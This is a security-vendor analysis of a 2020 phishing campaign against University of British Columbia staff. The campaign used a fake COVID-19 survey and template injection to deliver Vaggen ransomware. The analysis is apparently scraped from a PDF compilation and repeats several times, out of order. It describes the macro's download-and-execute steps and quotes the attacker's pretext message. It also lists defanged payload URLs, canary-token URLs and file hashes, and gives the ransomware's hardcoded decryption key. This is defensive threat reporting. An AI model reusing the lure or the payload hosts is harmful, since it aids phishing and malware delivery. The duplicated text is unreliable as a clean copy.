malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 128 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 129 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 130 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 131 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 132 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 133 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 134 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 135 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims who want to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful, thanks to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than sending the fake survey directly via email, the attacker uploaded the document to Box and DropBox and used the share functionality of these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam sent through file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of Shell to determine whether it was successful (on success, the return value is the task ID of the executed application)\r\nIf successful, it sends an HTTP GET request to: canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends an HTTP GET request to: canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted about a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 148 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 149 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 150 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 151 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 152 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 153 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 154 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 155 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 156 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 157 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 158 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 159 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 160 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 161 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 162 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 163 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 164 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 165 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 166 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 167 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 168 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
It uses a hardcoded key and a 12 byte long nonce generated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 byte long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs\r\n
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. The .docx itself contains no macro: it only carries a relationship pointing at the remote template, so the VBA never has to be present in the file that reaches the recipient.
